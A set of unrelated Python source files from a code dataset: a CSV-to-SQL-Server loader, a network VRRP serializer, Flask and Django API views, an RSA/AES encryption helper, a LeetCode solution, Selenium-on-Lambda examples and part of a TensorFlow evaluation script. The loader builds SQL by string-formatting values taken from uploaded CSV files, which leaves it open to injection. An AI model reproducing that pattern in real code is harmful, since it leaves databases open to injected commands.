r'D:\\COW\\WPA\\VFH\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'D:\\COW\\WPA\\VFH\\wpaptp\\UPLOAD'\nif sys.argv[1] == 'dev':\n logging_filename = r'\\\\cowsvdwx123\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'\\\\cowsvdwx123\\wpaptp\\UPLOAD'\nif sys.argv[1] == 'prod':\n logging_filename = r'\\\\cowsvpwx123\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'\\\\cowsvpwx123\\wpaptp\\UPLOAD'\nprint('logging_filename '+logging_filename)\nprint('upload_folder '+upload_folder)\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=logging_filename,\n filemode='w')\n# define a Handler which writes INFO messages or higher to the sys.stderr\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\n# set a format which is simpler for console use\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n# tell the handler to use this format\nconsole.setFormatter(formatter)\n# add the handler to the root logger\nlogging.getLogger('').addHandler(console)\n\nconnect_string = 'DRIVER={SQL Server Native Client 11.0};SERVER='+server+';DATABASE='+database+';Trusted_Connection=yes;'\nprint(connect_string)\n\ntry:\n cnxn = pyodbc.connect(connect_string)\nexcept pyodbc.Error as ex:\n #sqlstate = ex.args[0]\n print(ex)\n logger2 = logging.getLogger(connect_string)\n logger2.error(ex)\n sys.exit()\n\ncursor = cnxn.cursor()\n\nextension = '.csv'\ntable = 'MONTHLYTRIP'\n\nfor root, dirs, files in os.walk(upload_folder):\n print(\"upload_folder \"+upload_folder)\n print(\"root \"+ root)\n print(\"dirs \")\n print(dirs)\n print(\"files \")\n print(files)\n for fname in files:\n if os.path.splitext(fname)[-1] == extension:\n if any(ext in fname for ext in table):\n processedVar = True\n company_name_dir = root \n print(\"company_name_dir \"+company_name_dir)\n company_name_dir_fname = os.path.join(root, fname) \n print(\"company_name_dir_fname \"+company_name_dir_fname)\n print(\"fname \"+fname)\n CompanyName = fname.split(\"+\",1)[0]\n print(\"CompanyName \"+CompanyName)\n #ftpdate = fname.split(\"+\",2)[1]\n #print(\"ftpdate \"+ftpdate)\n #FTPDate = datetime.strptime(ftpdate, \"%Y%m%d_%H%M%S\")\n #print(FTPDate)\n logger1 = logging.getLogger(company_name_dir_fname)\n logger1.info('begin processing...')\n#[CompanyName] ,[FTPDate] ,[TotalTripsDispatcherStandard] ,[TotalTripsDispatcherAccessible] ,[TotalVehiclesPTPStandard] ,[TotalVehiclesPTPAccessible]) VALUES (\"\n\n with open(company_name_dir_fname, encoding='utf-8-sig') as f:\n\n first_column = True\n for row in csv.DictReader(f):\n\n print(\"row \")\n print(row)\n myDict = OrderedDict(row)\n\n #parameter_markers = ', '.join(['%s'] * len(myDict))\n parameter_markers = ', '.join(['?'] * len(myDict))\n print(\"parameter_markers\")\n print(parameter_markers)\n columns = \", \".join(myDict.keys())\n print(\"columns\")\n print(columns)\n values = \", \".join(repr(e) for e in myDict.values())\n print(\"values\")\n print(values)\n #sql = \"INSERT INTO %s ( %s ) VALUES ( %s )\" % (table, columns, parameter_markers)\n sql = \"INSERT INTO %s ( %s ) VALUES ( %s )\" % (table, columns, values)\n print(\"sql\")\n print(sql)\n print(\"myDict.values()\")\n print(myDict.values())\n #cursor.execute(sql, myDict.values())\n #cursor.execute(sql, 'ABCD', '3/31/2018', '2', '20', 'D')\n #sql = \"INSERT INTO MONTHLYTRIP ( Company_Name, Month_End, Lux_VehCount, Lux_TripCount, Service_Mode ) VALUES ('ABCD', '3/31/2018', '2', '20', 'D');\"\n cursor.execute(sql)\n 
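# Hypothetical parameterised variant of the insert above, in the direction the commented-out execute() calls were heading: pyodbc substitutes '?' markers from a sequence, so the values need no repr() quoting (column names still come from the CSV header).\n#\n#     columns = ', '.join(myDict.keys())\n#     markers = ', '.join(['?'] * len(myDict))\n#     sql = 'INSERT INTO {} ({}) VALUES ({})'.format(table, columns, markers)\n#     cursor.execute(sql, list(myDict.values()))\n#     cnxn.commit()\n                        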
cnxn.commit() \n #print(\"row \")\n #print(row)\n #myDict = OrderedDict(row)\n #for key in myDict.keys():\n # print(key)\n #myDict.keys()\n #print(\"myDict.keys() \")\n #print(myDict.keys())\n #keyVal = True\n\ncnxn.close() ","sub_path":"WPA/VFH/Python/Scripts/jets.py","file_name":"jets.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"93983862","text":"# Copyright 2015 Internap.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom netaddr import IPNetwork\n\nfrom netman.api.objects import Serializable\nfrom netman.core.objects.vrrp_group import VrrpGroup\n\n\nclass SerializableVrrpGroup(Serializable):\n def __init__(self, src):\n super(SerializableVrrpGroup, self).__init__(['id', 'ips', 'hello_interval', 'dead_interval', 'priority',\n 'track_id', 'track_decrement'])\n self.id = src.id\n self.ips = sorted([ipn.ip.format() for ipn in src.ips])\n self.priority = src.priority\n self.track_id = src.track_id\n self.track_decrement = src.track_decrement\n self.hello_interval = src.hello_interval\n self.dead_interval = src.dead_interval\n\n @classmethod\n def to_core(cls, **serialized):\n ips = serialized.pop('ips')\n return VrrpGroup(\n ips=[IPNetwork(ip) for ip in ips],\n ** serialized\n )\n","sub_path":"netman/api/objects/vrrp_group.py","file_name":"vrrp_group.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"527914884","text":"# Copyright (c) 2001-2016, Canal TP and/or its affiliates. All rights reserved.\n#\n# This file is part of Navitia,\n# the software to build cool stuff with public transport.\n#\n# Hope you'll enjoy and contribute to this project,\n# powered by Canal TP (www.canaltp.fr).\n# Help us simplify mobility and open public transport:\n# a non ending quest to the responsive locomotion way of traveling!\n#\n# LICENCE: This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see .\n#\n# Stay tuned using\n# twitter @navitia\n# IRC #navitia on freenode\n# https://groups.google.com/d/forum/navitia\n# www.navitia.io\n\nfrom typing import Optional\n\nimport flask_restful\nfrom flask import Response\nfrom flask import request\nfrom marshmallow import ValidationError\nfrom pymongo.errors import PyMongoError, DuplicateKeyError\n\nfrom tartare.core import models\nfrom tartare.decorators import (\n JsonDataValidate,\n ValidateContributorPrepocessesDataSourceIds,\n CheckContributorIntegrity,\n ValidateUniqueDataSources,\n RemoveLastActiveJob,\n RemoveDataSetsSize,\n)\nfrom tartare import metrics_api_errors, metrics_api_time\nfrom tartare.exceptions import EntityNotFound, IntegrityException, ParameterException\nfrom tartare.http_exceptions import InvalidArguments, DuplicateEntry, InternalServerError, ObjectNotFound\nfrom tartare.interfaces import schema\nfrom tartare.interfaces.common_argrs import Pagination\nfrom tartare.processes.processes import ProcessManager\n\n\nclass Contributor(flask_restful.Resource, Pagination):\n @classmethod\n def __pre_save_contributor(cls, post_data: dict) -> models.Contributor:\n if \"data_prefix\" not in post_data:\n raise InvalidArguments(\"contributor data_prefix must be specified\")\n processes = post_data.get(\"processes\", [])\n ProcessManager.check_processes_for_instance(processes, \"contributor\")\n try:\n contributor = schema.ContributorSchema().load(post_data)\n contributor.add_computed_data_sources()\n return contributor\n except ValidationError as err:\n raise InvalidArguments(err.messages)\n except IntegrityException as exc:\n raise InvalidArguments(str(exc))\n\n metrics_api_errors_contributors_post = metrics_api_errors.labels(endpoint=\"contributors\", method=\"post\")\n metrics_api_time_contributors_post = metrics_api_time.labels(endpoint=\"contributors\", method=\"post\")\n\n @metrics_api_errors_contributors_post.count_exceptions()\n @metrics_api_time_contributors_post.time()\n @JsonDataValidate()\n @ValidateUniqueDataSources()\n @ValidateContributorPrepocessesDataSourceIds()\n @CheckContributorIntegrity()\n def post(self) -> Response:\n post_data = request.json\n contributor = self.__pre_save_contributor(post_data)\n\n try:\n contributor.save()\n except ValidationError as err:\n raise InvalidArguments(err.messages)\n except DuplicateKeyError as e:\n raise DuplicateEntry(\"duplicate entry: {}\".format(str(e)))\n except PyMongoError:\n raise InternalServerError(\"impossible to add contributor {}\".format(contributor))\n\n return ({\"contributors\": [schema.ContributorSchema().dump(models.Contributor.get(contributor.id))]}, 201)\n\n metrics_api_errors_contributors_get = metrics_api_errors.labels(endpoint=\"contributors\", method=\"get\")\n metrics_api_time_contributors_get = metrics_api_time.labels(endpoint=\"contributors\", method=\"get\")\n\n @metrics_api_errors_contributors_get.count_exceptions()\n @metrics_api_time_contributors_get.time()\n def get(self, contributor_id: Optional[str] = None) -> Response:\n try:\n if contributor_id:\n result = schema.ContributorSchema().dump(models.Contributor.get(contributor_id))\n return {\"contributors\": [result]}, 200\n contributors, total = models.Contributor.get_some(\n data_formats=request.args.getlist(\"data_formats\"),\n coverage_id=request.args.get(\"coverage_id\"),\n data_source_id=request.args.get(\"data_source_id\"),\n page=self.page,\n per_page=self.per_page,\n )\n return (\n {\n \"contributors\": schema.ContributorSchema(many=True).dump(contributors),\n 
\"pagination\": {\"page\": self.page, \"per_page\": self.per_page, \"total\": total},\n },\n 200,\n )\n except ValidationError as err:\n raise InvalidArguments(err.messages)\n except EntityNotFound as e:\n raise ObjectNotFound(str(e))\n except ParameterException as e:\n raise InvalidArguments(str(e))\n\n metrics_api_errors_contributors_delete = metrics_api_errors.labels(endpoint=\"contributors\", method=\"delete\")\n metrics_api_time_contributors_delete = metrics_api_time.labels(endpoint=\"contributors\", method=\"delete\")\n\n @metrics_api_errors_contributors_delete.count_exceptions()\n @metrics_api_time_contributors_delete.time()\n def delete(self, contributor_id: str) -> Response:\n try:\n c = models.Contributor.delete(contributor_id)\n if c == 0:\n raise ObjectNotFound(\"contributor '{}' not found\".format(contributor_id))\n return \"\", 204\n except IntegrityException as e:\n raise InvalidArguments(f\"unable to delete contributor {contributor_id}: {str(e)}\")\n\n metrics_api_errors_contributors_put = metrics_api_errors.labels(endpoint=\"contributors\", method=\"put\")\n metrics_api_time_contributors_put = metrics_api_time.labels(endpoint=\"contributors\", method=\"put\")\n\n @metrics_api_errors_contributors_put.count_exceptions()\n @metrics_api_time_contributors_put.time()\n @JsonDataValidate()\n @RemoveLastActiveJob()\n @ValidateUniqueDataSources()\n @ValidateContributorPrepocessesDataSourceIds()\n @CheckContributorIntegrity(True)\n @RemoveDataSetsSize()\n def put(self, contributor_id: str) -> Response:\n post_data = request.json\n if \"id\" in post_data and contributor_id != post_data[\"id\"]:\n raise InvalidArguments(\"the modification of the id is not possible\")\n post_data[\"id\"] = contributor_id\n new_contributor = self.__pre_save_contributor(post_data)\n try:\n existing_contributor = models.Contributor.get(contributor_id)\n # we check if a data source has been removed and not used anywhere\n data_source_ids = existing_contributor.has_one_of_data_source_removed(new_contributor)\n if len(data_source_ids):\n existing_contributor.check_contributors_using_integrity(data_source_ids)\n existing_contributor.check_coverages_using_integrity(data_source_ids)\n\n existing_contributor.update_with_object(new_contributor)\n except IntegrityException as e:\n raise InvalidArguments(f\"unable to update contributor {existing_contributor.get_id()}: {str(e)}\")\n except ValidationError as err:\n raise InvalidArguments(err.messages)\n except EntityNotFound as e:\n raise ObjectNotFound(str(e))\n except DuplicateKeyError as e:\n raise DuplicateEntry(\"duplicate entry: {}\".format(str(e)))\n except PyMongoError:\n raise InternalServerError(\"impossible to add contributor {}\".format(new_contributor))\n\n return ({\"contributors\": [schema.ContributorSchema().dump(models.Contributor.get(contributor_id))]}, 200)\n","sub_path":"tartare/interfaces/contributors.py","file_name":"contributors.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"619528473","text":"# Copyright 2015 Google Inc. 
All Rights Reserved.\n\"\"\"The gcloud datastore emulator group.\"\"\"\n\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.emulators.lib import datastore_util\n\n\nclass Datastore(base.Group):\n \"\"\"Manage your local datastore emulator.\n\n This set of commands allows you to start and use a local datastore emulator.\n \"\"\"\n\n detailed_help = {\n 'DESCRIPTION': '{description}',\n 'EXAMPLES': \"\"\"\\\n To start a local datastore emulator, run:\n\n $ {command} start\n \"\"\",\n }\n\n @staticmethod\n def Args(parser):\n parser.add_argument(\n '--data-dir',\n required=False,\n help='The directory to be used to store/retrieve data/config for an'\n ' emulator run.')\n\n def Filter(self, context, args):\n datastore_util.CheckIfJava7IsInstalled()\n datastore_util.EnsureGCDComponentIsInstalled()\n\n if not args.data_dir:\n args.data_dir = datastore_util.GetDataDir()\n","sub_path":"googsdk/google-cloud-sdk/lib/googlecloudsdk/emulators/commands/datastore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"455430444","text":"# Copyright 2023 UW-IT, University of Washington\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\" Changes\n =================================================================\n\n sbutler1@illinois.edu: move some of the URL parameter parsing into\n here to simplify the URL patterns; adapt to the new RESTDispatch\n framework.\n\"\"\"\ntry:\n from cStringIO import StringIO as IOStream\nexcept ModuleNotFoundError:\n from io import BytesIO as IOStream\n\nfrom spotseeker_server.views.rest_dispatch import RESTDispatch, RESTException\nfrom spotseeker_server.models import ItemImage, Item\nfrom django.http import HttpResponse\nfrom django.utils.http import http_date\nfrom spotseeker_server.require_auth import app_auth_required\nfrom PIL import Image\nimport time\nimport re\n\nRE_WIDTH = re.compile(r\"width:(\\d+)\")\nRE_HEIGHT = re.compile(r\"height:(\\d+)\")\nRE_WIDTHxHEIGHT = re.compile(r\"^(\\d+)x(\\d+)$\")\n\n\nclass ItemThumbnailView(RESTDispatch):\n \"\"\"Returns 200 with a thumbnail of a ItemImage.\"\"\"\n\n @app_auth_required\n def GET(\n self,\n request,\n item_id,\n image_id,\n thumb_dimensions=None,\n constrain=False,\n ):\n img = ItemImage.objects.get(pk=image_id)\n item = img.item\n\n if int(item.pk) != int(item_id):\n raise RESTException(\n \"Image Item ID doesn't match item id in url\", 404\n )\n\n if thumb_dimensions is None:\n raise RESTException(\"Image constraints required\", 400)\n\n thumb_width = None\n thumb_height = None\n if constrain:\n m = RE_WIDTH.search(thumb_dimensions)\n if m:\n thumb_width = m.group(1)\n m = RE_HEIGHT.search(thumb_dimensions)\n if m:\n thumb_height = m.group(1)\n\n if thumb_width is None and thumb_height is None:\n raise RESTException(\"Image constraints required\", 400)\n elif thumb_width is None:\n thumb_width = img.width\n elif thumb_height is None:\n thumb_height = img.height\n else:\n m = RE_WIDTHxHEIGHT.match(thumb_dimensions)\n if not m:\n raise RESTException(\"Image constraints required\", 400)\n else:\n thumb_width = m.group(1)\n thumb_height = m.group(2)\n\n thumb_width = int(thumb_width)\n thumb_height = int(thumb_height)\n\n if thumb_height <= 0 or thumb_width <= 0:\n raise RESTException(\"Bad image constraints\", 400)\n\n image = img.image\n im = Image.open(image.file)\n\n if constrain:\n im.thumbnail((thumb_width, thumb_height), resample=Image.LANCZOS)\n thumb = im\n else:\n thumb = 
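The `ItemThumbnailView` above accepts two dimension grammars: constrained requests carry free-order `width:W` / `height:H` fragments (either may be omitted), while exact requests are a single `WxH` token. That parsing, isolated with the same regexes:

```python
# The two dimension grammars accepted by ItemThumbnailView.GET, isolated.
import re

RE_WIDTH = re.compile(r"width:(\d+)")
RE_HEIGHT = re.compile(r"height:(\d+)")
RE_WIDTHxHEIGHT = re.compile(r"^(\d+)x(\d+)$")


def parse_dims(spec, constrain):
    if constrain:
        w = RE_WIDTH.search(spec)
        h = RE_HEIGHT.search(spec)
        return (int(w.group(1)) if w else None,
                int(h.group(1)) if h else None)
    m = RE_WIDTHxHEIGHT.match(spec)
    return (int(m.group(1)), int(m.group(2))) if m else (None, None)


assert parse_dims("width:100,height:80", True) == (100, 80)
assert parse_dims("height:80", True) == (None, 80)
assert parse_dims("200x150", False) == (200, 150)
```

Downstream, the view relies on a PIL distinction worth remembering: `Image.thumbnail` shrinks in place and preserves aspect ratio, while `Image.resize` returns a new image at exactly the requested dimensions.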
im.resize(\n (thumb_width, thumb_height), resample=Image.LANCZOS\n )\n\n tmp = IOStream()\n thumb.save(tmp, im.format, quality=95)\n tmp.seek(0)\n\n response = HttpResponse(tmp.getvalue(), content_type=img.content_type)\n # 7 day timeout?\n response[\"Expires\"] = http_date(time.time() + 60 * 60 * 24 * 7)\n return response\n","sub_path":"spotseeker_server/views/item_thumbnail.py","file_name":"item_thumbnail.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61366689","text":"from Crypto.PublicKey import RSA\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Cipher import AES, PKCS1_OAEP\n\n\nclass Crypt(object):\n def __init__(self, private_pem, receiver_public_pem):\n super(Crypt, self).__init__()\n\n self.private_key = RSA.import_key(private_pem)\n self.receiver_public_key = RSA.import_key(receiver_public_pem)\n\n def encrypt(self, data):\n key = self.receiver_public_key\n session_key = get_random_bytes(16)\n\n cipher_rsa = PKCS1_OAEP.new(key)\n enc_session_key = cipher_rsa.encrypt(session_key)\n\n cipher_aes = AES.new(session_key, AES.MODE_EAX)\n ciphertext, tag = cipher_aes.encrypt_and_digest(data)\n\n nonce = cipher_aes.nonce\n\n encrypted_data = b\"\".join([enc_session_key, nonce, tag, ciphertext])\n return encrypted_data\n\n def decrypt(self, encrypted_data):\n key = self.private_key\n key_size = key.size_in_bytes()\n\n enc_session_key = encrypted_data[0:key_size]\n nonce = encrypted_data[key_size : key_size + 16]\n tag = encrypted_data[key_size + 16 : key_size + 32]\n ciphertext = encrypted_data[key_size + 32 :]\n\n cipher_rsa = PKCS1_OAEP.new(key)\n session_key = cipher_rsa.decrypt(enc_session_key)\n\n cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)\n data = cipher_aes.decrypt_and_verify(ciphertext, tag)\n return data\n","sub_path":"device/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"69274382","text":"\nclass Solution(object):\n def numberOfArithmeticSlices(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n\n ACE\n 35 ms\n\n O(n)\n\n https://leetcode.com/problems/arithmetic-slices/discuss/90058/Simple-Java-solution-9-lines-2ms\n leetcode.com/problems/arithmetic-slices/discuss/90058/Simple-Java-solution-9-lines-2ms/94634\n leetcode.com/problems/arithmetic-slices/discuss/90058/Simple-Java-solution-9-lines-2ms/94631\n \"\"\"\n curr, res = 0, 0\n for i in range(2, len(A)):\n if A[i] - A[i-1] == A[i-1] - A[i-2]:\n curr += 1\n res += curr\n else:\n curr = 0\n return res\n\n def numberOfArithmeticSlicesV1(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n\n ACE\n 35 ms\n\n BRUTE FORCE\n\n for each possible slice, check if it is arithemetic; if it is arithmetic then increment the result\n\n SLIDING WINDOW\n\n use a sliding window to check for arithmetic slices.\n if no slice is found from lo then lo = lo + 1.\n if a slice (of minimum length 3) is found from lo then\n update result according to the formula:\n\n slice_length = hi - lo + 1\n res += 1 + (slice_length - 3)\n\n this is because for longer slices we form additional results by\n including or excluding elements at the lowest indices.\n\n for example, given a slice length of 4, we can include the lowest\n element and exclude the lowest element to form two new slices to\n count in the result.\n \"\"\"\n N = len(A)\n lo = 0\n res = 0\n while lo <= N - 3:\n hi = lo + 1\n difference = 
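A hypothetical round trip through the `Crypt` class above (device/crypt.py): PyCryptodome's RSA/AES-EAX hybrid, where a fresh 16-byte session key is RSA-OAEP-wrapped and the payload layout is `enc_session_key ‖ nonce ‖ tag ‖ ciphertext`. Keys are generated on the spot purely for illustration, and `Crypt` is assumed importable from the module above:

```python
# Hypothetical round trip through the Crypt class above (PyCryptodome).
# Fresh 2048-bit keys are generated on the fly purely for illustration.
from Crypto.PublicKey import RSA

alice_key = RSA.generate(2048)
bob_key = RSA.generate(2048)

alice = Crypt(alice_key.export_key(), bob_key.publickey().export_key())
bob = Crypt(bob_key.export_key(), alice_key.publickey().export_key())

blob = alice.encrypt(b"device telemetry payload")
# Layout: 256-byte RSA-wrapped key | 16-byte nonce | 16-byte tag | ciphertext
assert bob.decrypt(blob) == b"device telemetry payload"
```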
A[hi] - A[lo]\n while hi < N and A[hi] - A[hi - 1] == difference:\n hi += 1\n slice_length = hi - lo\n if slice_length >= 3:\n res += 1 + slice_length - 3\n lo = hi - 1 # ?\n # if hi - lo + 1 >= 3:\n # lo = hi\n # else:\n # lo = lo + 1\n\n return res\n\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n (\n [1, 2, 3, 4],\n 3\n ),\n (\n [1, 1, 2, 5, 7],\n 0\n ),\n (\n [0, 1, 3, 5, 7, 17, 27],\n 4\n ),\n (\n [11, 21, 31, 41, 51],\n 6\n ),\n ]\n for A, exp in tests:\n print(A)\n res = s.numberOfArithmeticSlices(A)\n print(res)\n assert res == exp\n\n\n","sub_path":"413_arithmetic_slices.py","file_name":"413_arithmetic_slices.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"74943427","text":"import selenium\nfrom selenium.webdriver import Chrome, ChromeOptions\n\ntry:\n \"\"\"umihico\"\"\"\n from apigateway_credentials import awsgateway_url, awsgateway_apikey\nexcept Exception as e:\n \"\"\"others users, developers\"\"\"\n awsgateway_apikey = \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n awsgateway_url = \"https://XXXXXXXXXX.execute-api.us-west-2.amazonaws.com/default/chromeless\"\n\ntry:\n \"\"\"developers (cloners)\"\"\"\n from pypi.chromeless.chromeless import Chromeless, LambdaAlreadyTriggeredException\nexcept Exception as e:\n \"\"\"script downloaders\"\"\"\n from chromeless import Chromeless, LambdaAlreadyTriggeredException\n\n\ndef get_title(self, url):\n self.get(url)\n return self.title\n\n\ndef example_of_get_title():\n \"\"\"basic example\"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(get_title)\n result = chrome.get_title(\"https://google.com\")\n print(result, type(result))\n # Google \n\n\ndef get_list(self):\n self.get(\"https://stackoverflow.com/\")\n question_titles = [e.text for e in self.find_elements_by_xpath(\n \"//h3/a[@class='question-hyperlink']\")]\n return question_titles\n\n\ndef example_of_get_list():\n \"\"\"you can get any type if it's picklable. 
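For the arithmetic-slices solutions above: a maximal arithmetic run of length L contributes (L-1)(L-2)/2 slices of length ≥ 3, which is exactly what the incremental `curr` accumulator sums to. (The docstring formula used in V1, `res += 1 + (slice_length - 3)`, evaluates to L-2 and undercounts for L ≥ 4 — plausibly what the trailing `# ?` comment is flagging.) A quick cross-check against the closed form, assuming the `Solution` class above is in scope:

```python
# Cross-check of the counting logic: a maximal arithmetic run of length L
# holds (L-1)(L-2)/2 slices of length >= 3, which is what the incremental
# `curr` accumulator sums to.
def closed_form(L):
    return (L - 1) * (L - 2) // 2 if L >= 3 else 0


s = Solution()
for L in range(3, 8):
    run = list(range(L))  # one maximal arithmetic run: 0, 1, 2, ...
    assert s.numberOfArithmeticSlices(run) == closed_form(L)
```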
this is example\"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(get_list)\n result = chrome.get_list()\n print(result[:2], type(result))\n # ['JSoup: how to list links from a list?', 'How to Fix PHPSESSID issue in Symfony 3.4'] \n\n\ndef get_title_letter_num(self, url):\n return len(self.get_title(url))\n\n\ndef example_of_get_title_letter_num():\n \"\"\"\n you can call only one method,\n but you can bind multiple method and use them all by wrapping.\n \"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(get_title)\n chrome.attach_method(get_title_letter_num)\n result = chrome.get_title_letter_num(\"http://github.com\")\n print(result, type(result))\n # 58 \n\n\ndef get_screenshot(self, url, filename):\n self.get(url)\n self.save_screenshot(filename)\n\n\ndef example_of_get_screenshot():\n \"\"\"\n just use the same local path argument as same as origin Chrome.save_screenshot(path).\n Chromeless will transfer from lambda to your local.\n \"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(get_screenshot)\n result = chrome.get_screenshot(\"https://www.yahoo.co.jp/\", \"screenshot.png\")\n print(result, type(result))\n # None \n\n\ndef example_of_default_method():\n \"\"\"\n you can also run simple default method on Chrome\n \"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n result = chrome.get(\"http://aws.amazon.com\")\n print(result, type(result))\n # None \n\n\ndef example_of_twice_called_error():\n \"\"\"you can't call method more than once\"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.get(\"http://github.com\")\n try:\n chrome.get(\"https://google.com\")\n except LambdaAlreadyTriggeredException as e:\n print('(expected error)', e)\n # (expected error) If you have multiple methods, please wrap them and call the wrapper instead.\n\n\ndef cause_NoSuchElementException(self):\n self.get(\"http://github.com\")\n self.find_element_by_xpath(\"//nonexistelement\") # cause NoSuchElementException in lambda\n\n\ndef example_of_cause_NoSuchElementException():\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(cause_NoSuchElementException)\n try:\n chrome.cause_NoSuchElementException()\n except selenium.common.exceptions.NoSuchElementException as e:\n print('(expected error)', e)\n\n\ndef example_of_changing_windowsize():\n chrome_options = ChromeOptions()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--disable-gpu\")\n chrome_options.add_argument(\"--window-size=1920x1080\")\n # default is \"--window-size=1280x1696\"\n chrome_options.add_argument(\"--disable-application-cache\")\n chrome_options.add_argument(\"--disable-infobars\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument(\"--hide-scrollbars\")\n chrome_options.add_argument(\"--enable-logging\")\n chrome_options.add_argument(\"--log-level=0\")\n chrome_options.add_argument(\"--single-process\")\n chrome_options.add_argument(\"--ignore-certificate-errors\")\n chrome_options.add_argument(\"--homedir=/tmp\")\n chrome = Chromeless(awsgateway_url, awsgateway_apikey, chrome_options=chrome_options)\n chrome.attach_method(get_screenshot)\n result = chrome.get_screenshot(\"https://github.com/umihico\", \"screenshot.png\")\n print(result, type(result))\n\n\nif __name__ == '__main__':\n example_of_get_title()\n example_of_get_list()\n example_of_get_title_letter_num()\n example_of_get_screenshot()\n 
example_of_default_method()\n example_of_twice_called_error()\n example_of_cause_NoSuchElementException()\n example_of_changing_windowsize()\n","sub_path":"examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":5068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"434568217","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nimport numpy as np\nimport csv\nimport time as timefunc\nimport sys\nimport os\nimport pandas as pd\nimport cv2\nfrom tqdm import tqdm\nimport subprocess\nimport math\nimport gc\n\nwork_dirname = (os.path.dirname(os.path.abspath(__file__)))\nimport ShareNetFunc as nfunc\nfrom ImageGenerator import ImageGenerator\n\nclass EvaCkpt:\n def __init__(self, net_cls, path_cls, exe_file,\n model_hw=[256,256,], fin_activate='sigmoid',\n standardization_csv_path=None, \n standardization=False):\n self.net_cls = net_cls\n self.path_cls = path_cls\n self.exe_file = exe_file\n self.model_h = model_hw[0]\n self.model_w = model_hw[1]\n self.fin_activate = fin_activate\n self.standardization_csv_path = standardization_csv_path\n self.standardization = standardization\n self.csv_header = ['step',\n 'short', \n 'break+break_same', \n 'total',\n 'division', \n 'short_area',\n 'break_area', \n 'break_same_area']\n\n def run(self, img_path_set, ans_path_set):\n # imagenameの取得\n img_name_set = []\n for img_index in range(len(img_path_set)):\n s = img_path_set[img_index].find('L00')\n img_n = (img_path_set[img_index][s: s+5])\n img_name_set.append(img_n)\n\n # workfolderの作成\n work_path = self.path_cls.get_outroot_path() + '/workfolder'\n os.makedirs(work_path, exist_ok=True)\n\n # csvファイルの作成\n csv_file_names = []\n for img_index in range(len(img_path_set)):\n img_path = img_path_set[img_index]\n img_name = img_name_set[img_index]\n csv_file = self.path_cls.make_csv_path('eva_ckpt_'+img_name+'.csv')\n csv_file_names.append(csv_file)\n if not os.path.isfile(csv_file):\n with open(csv_file, 'w') as f:\n writer_total = csv.writer(f, lineterminator='\\n')\n writer_total.writerow(self.csv_header)\n\n # checkpoint の検索\n ckpt_path_set = self.path_cls.search_checkpoint_path()\n\n # checkpoint の変更\n for ckpt_index in range(len(ckpt_path_set)):\n print('========== now ckpt: ' +str(ckpt_index+1)+ ' / '+ str(len(ckpt_path_set)) + ' ==========')\n ckpt_path = ckpt_path_set[ckpt_index]\n self.net_cls.ckpt_restore(ckpt_path)\n step = self.net_cls.get_step()\n\n # 過去のmodel削除\n model_path = os.path.join(work_path, 'ckpt_model.h5')\n if os.path.exists( model_path ):\n os.remove( model_path )\n\n # 